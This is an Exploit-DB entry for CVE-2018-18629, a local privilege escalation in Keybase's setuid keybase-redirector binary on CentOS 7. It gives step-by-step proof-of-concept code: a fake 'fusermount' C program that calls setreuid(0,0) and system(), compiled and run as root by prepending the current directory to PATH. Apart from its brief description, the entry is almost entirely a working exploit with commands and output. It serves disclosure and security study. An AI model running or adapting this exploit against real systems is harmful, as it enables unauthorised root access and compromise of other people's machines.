Keybase keybase-redirector - '$PATH' Local Privilege Escalation

EDB-ID:

46044

CVE:

2018-18629

EDB Verified:

Author:

mirchr

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2018-10-22

Vulnerable App: 
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.

## Environment

CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64

RPM info

```
Name        : keybase
Version     : 2.8.0.20181017144746.3efc4cbf3c
Release     : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group       : Unspecified
Size        : 273302678
License     : BSD
Signature   : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM  : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date  : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host  : 6ae61e160e87
Relocations : (not relocatable)
Summary     : Keybase command line client
Description :
Keybase command line client
```

An unprivileged user named user1 is used for this PoC.

## Steps to reproduce

1) Display privileges of user 1 - execute the id command

```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.

```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv)
{
  setreuid(0,0);
  system("/usr/bin/touch /w00t");
  return(0);
}
EOF
``

3) Compile fusermount.c

```
gcc -Wall fusermount.c -o fusermount
```

4) Verify that /w00t does not exist.

```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```

5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.

```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```

6) Enter the control-c sequence to kill the application.

```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```

7) Verify that /w00t exists

```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```

## Impact

Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services